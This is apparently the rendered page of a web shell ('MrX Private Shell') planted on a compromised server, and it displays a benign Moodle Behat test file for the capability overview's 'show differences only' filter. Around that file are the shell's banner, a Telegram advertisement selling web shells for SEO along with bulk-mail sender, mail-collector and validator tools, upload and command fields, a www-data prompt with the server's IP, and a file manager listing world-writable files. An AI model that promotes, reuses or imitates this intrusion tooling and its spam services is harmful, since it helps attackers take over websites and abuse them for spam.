__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@tool @tool_capability
Feature: show only differences between roles for selected capabilities
  In order to check roles capabilities
  As an admin
  I need to be able to filter capabilities report viewing only role differences

  Background:
    Given the following "roles" exist:
      | shortname     | name      | archetype |
      | studenteq     | Studenteq | student   |
      | studentdf     | Studentdf | student   |
    And the following "permission overrides" exist:
      | capability                    | permission | role        | contextlevel | reference |
      | moodle/course:changefullname  | Allow      | studentdf   | System       |           |
      | moodle/course:changeshortname | Prohibit   | studentdf   | System       |           |
    And I log in as "admin"
    And I navigate to "Users > Permissions > Capability overview" in site administration

  Scenario: Compare identical roles
    When I set the following fields to these values:
      | Capability: | moodle/course:changefullname, moodle/course:changeshortname, moodle/course:changeidnumber, moodle/course:changesummary |
      | Roles:      | Student, Studenteq                                                                                                     |
    And I set the field "Show differences only" to "1"
    And I click on "Get the overview" "button"
    Then I should see "There are no differences to show between selected roles in this context"

  Scenario: Compare different roles
    When I set the following fields to these values:
      | Capability: | moodle/course:changefullname, moodle/course:changeshortname, moodle/course:changeidnumber, moodle/course:changesummary |
      | Roles:      | Student, Studentdf                                                                                                     |
    And I set the field "Show differences only" to "1"
    And I click on "Get the overview" "button"
    Then I should not see "There are no differences to show between selected roles in this context"
    And I should see "moodle/course:changefullname" in the "comparisontable" "table"
    And I should see "moodle/course:changeshortname" in the "comparisontable" "table"
    And I should not see "moodle/course:changesummary" in the "comparisontable" "table"

  Scenario: Compare different roles but comparing capabilities that are equals on both
    When I set the following fields to these values:
      | Capability: | moodle/course:changeidnumber, moodle/course:changesummary |
      | Roles:      | Student, Studentdf                                        |
    And I set the field "Show differences only" to "1"
    And I click on "Get the overview" "button"
    Then I should see "There are no differences to show between selected roles in this context"

  Scenario: Compare all roles without selecting specific role
    When I set the following fields to these values:
      | Capability: | moodle/course:changefullname, moodle/site:config |
    And I set the field "Show differences only" to "1"
    And I click on "Get the overview" "button"
    Then I should not see "moodle/site:config" in the "comparisontable" "table"
    And I should see "moodle/course:changefullname" in the "comparisontable" "table"

  Scenario: Compare all roles without selecting specific role on not defined capability
    When I set the following fields to these values:
      | Capability: | moodle/site:config |
    And I set the field "Show differences only" to "1"
    And I click on "Get the overview" "button"
    Then I should see "There are no differences to show between selected roles in this context"

  Scenario: Comparing only one role
    When I set the following fields to these values:
      | Capability: | moodle/course:changefullname, moodle/course:changeshortname, moodle/course:changeidnumber, moodle/course:changesummary |
      | Roles:      | Student                                                                                                                |
    And I set the field "Show differences only" to "1"
    And I click on "Get the overview" "button"
    Then I should see "There are no differences to show between selected roles in this context"

Filemanager

Name Type Size Permission Actions
show_capabilies.feature File 5.61 KB 0777
show_contexts.feature File 6.87 KB 0777
show_differences.feature File 4.1 KB 0777
Filemanager